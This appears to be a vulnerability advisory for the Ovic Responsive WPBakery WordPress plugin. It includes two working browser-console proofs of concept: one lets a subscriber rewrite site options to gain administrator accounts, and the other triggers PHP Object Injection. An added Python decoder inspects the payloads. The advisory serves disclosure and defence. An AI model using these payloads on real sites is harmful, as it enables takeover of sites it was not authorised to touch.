WordPress Plugin Vulnerabilities
Ovic Responsive WPBakery < 1.2.9 - Subscriber+ Option Update
Description
The plugin does not restrict which options can be updated via some of its AJAX actions, and it does not require more than a logged-in account to call them, so any authenticated attacker with a Subscriber or higher role can update arbitrary blog options, such as `users_can_register` and `default_role`, and thereby turn open registration into a route to an administrator account. The same code path unserializes user-supplied input, which may lead to PHP Object Injection. The second Proof of Concept below shows that, after version 1.2.8, an administrator can still reach that unserialize() call.
Proof of Concept
1) Log in to the site as a subscriber.
2) Run the following in your browser's console:
```
// Calls the plugin's import AJAX action as the logged-in subscriber;
// `data` is the pre-built encoded options blob from the PoC.
fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  credentials: 'include',
  mode: 'cors',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8' },
  body: 'action=ovic_vc_import_options&data=eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w'
})
  .then(response => response.text())
  .then(data => console.log(data));
```
3) Log out, and visit /wp-login.php to create a new account, which will automatically be given the `administrator` role.

---

After version 1.2.8, the following PoC demonstrates a remaining Admin+ object deserialization vulnerability:

1) Ensure that the WPBakery plugin is installed and activated.
2) Put the following code on the server, somewhere PHP loads it on every request, to simulate a malicious gadget chain:
```
<?php
// Stand-in for a real gadget chain: any class with a __wakeup() that is
// defined when unserialize() runs. This one only logs and exits.
class Evil {
    public function __wakeup() : void {
        error_log( "[*] Evil object unserialize! BOOM!" );
        die( "[*] Evil object unserialize! BOOM!" );
    }
}
```
3) Visit the /wp-admin/admin.php?page=ovic-vc-addon page as an admin user.
4) Run the following code in the browser's console to see the deserialization occur:
```
// ovic_vc_params.ajaxurl is set by the plugin's admin page script;
// `data` is the encoded serialized Evil object.
fetch(ovic_vc_params.ajaxurl, {
  method: 'POST',
  credentials: 'include',
  mode: 'cors',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8' },
  body: 'action=ovic_vc_import_options&data=eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo'
})
  .then(response => response.text())
  .then(data => console.log(data));
```
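The `data` parameter in both PoCs carries the PHP-serialized value that the plugin's import handler hands to unserialize(). The following Python is an added example for inspecting such payloads offline; it is neither the plugin's code nor the researcher's. It assumes, from the payloads alone and not from the plugin source, that the parameter is URL-safe Base64 of a zlib stream wrapping serialize() output (both payloads begin with `eNo`/`eNr`, the Base64 of the zlib header byte 0x78). The Admin+ payload also contains a backslash followed by `0` where the zlib stream needs a NUL byte, which is the escaping PHP's addslashes() produces, so the decoder reverses that when a plain inflate fails. All function names are the example's own.

```python
"""Inspect the `data` parameter of the ovic_vc_import_options PoCs offline.

Assumed format, inferred from the payloads on this page and not from the
plugin source: URL-safe Base64 -> zlib stream -> PHP serialize() output.
The Admin+ payload also contains a backslash followed by '0' where the zlib
stream needs a NUL byte (the escaping PHP's addslashes() produces), so that
is reversed when a plain inflate fails. All function names are this example's.
"""
import base64
import zlib

# `data` values copied from the two PoCs above.
OPTIONS_PAYLOAD = "eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w"
EVIL_PAYLOAD = "eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo"


def php_stripslashes(data: bytes) -> bytes:
    # Mirrors PHP stripslashes(): drops one backslash, maps backslash-'0' to
    # a real NUL byte, and discards a trailing lone backslash.
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == 0x5C:
            i += 1
            if i < len(data):
                out.append(0 if data[i] == 0x30 else data[i])
                i += 1
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def decode_data_param(param: str) -> bytes:
    """Return the PHP-serialized bytes that unserialize() would receive."""
    raw = base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))
    try:
        return zlib.decompress(raw)
    except zlib.error:
        # Adler-32 trailer mangled by addslashes(); undo that and retry.
        return zlib.decompress(php_stripslashes(raw))


def encode_data_param(serialized: bytes) -> str:
    """Inverse of decode_data_param(), producing the unslashed form."""
    return base64.urlsafe_b64encode(zlib.compress(serialized, 9)).decode().rstrip("=")


def php_unserialize(buf: bytes, pos: int = 0):
    """Minimal PHP unserialize() for N, i, b, d, s, a and O.

    Returns (value, next_offset). Objects come back as the tagged tuple
    ("object", class_name, properties) instead of being instantiated, which
    is what a triage tool should do with untrusted serialized data."""
    t = chr(buf[pos])
    if t == "N":                                            # N;
        return None, pos + 2
    if t in "ibd":                                          # i:42;  b:1;  d:0.5;
        end = buf.index(b";", pos)
        text = buf[pos + 2:end].decode()
        return {"i": int, "b": lambda v: v == "1", "d": float}[t](text), end + 1
    if t == "s":                                            # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2
        return buf[start:start + length].decode("utf-8", "replace"), start + length + 2
    if t in "aO":                                 # a:<n>:{...}  O:<len>:"<class>":<n>:{...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])                     # element count or class-name length
        pos = colon + 1
        name = None
        if t == "O":
            name = buf[pos + 1:pos + 1 + count].decode()
            pos += count + 3                                # past "<class>":
            colon = buf.index(b":", pos)
            count = int(buf[pos:colon])
            pos = colon + 1
        pos += 1                                            # {
        items = {}
        for _ in range(count):
            key, pos = php_unserialize(buf, pos)
            items[key], pos = php_unserialize(buf, pos)
        pos += 1                                            # }
        return (("object", name, items) if t == "O" else items), pos
    raise ValueError(f"unsupported serialized type {t!r} at offset {pos}")


if __name__ == "__main__":
    evil = decode_data_param(EVIL_PAYLOAD)
    print(evil)                          # b'O:4:"Evil":0:{}'
    print(php_unserialize(evil)[0])      # ('object', 'Evil', {})
    try:
        print(php_unserialize(decode_data_param(OPTIONS_PAYLOAD))[0])
    except (zlib.error, ValueError) as exc:
        print("could not decode Subscriber+ payload:", exc)
```

For the Admin+ payload this yields `O:4:"Evil":0:{}`, a serialized instance of class `Evil` with no properties: the moment PHP's unserialize() sees it, the `__wakeup()` of the gadget stub fires, which is the whole Object Injection primitive. The parser deliberately returns a tagged tuple instead of instantiating anything, so the same tool is safe to point at other serialized blobs (WordPress options, transients, cookies) during triage; the Subscriber+ payload is decoded on a best-effort basis and its contents are only printed, not relied on.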
Affects Plugins
References
CVE
Classification
Type
PRIVESC
OWASP top 10
CWE
Miscellaneous
Original Researcher
Gibran Abdillah
Submitter
Gibran Abdillah
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-07
Added
2023-12-13
Last Updated
2023-12-18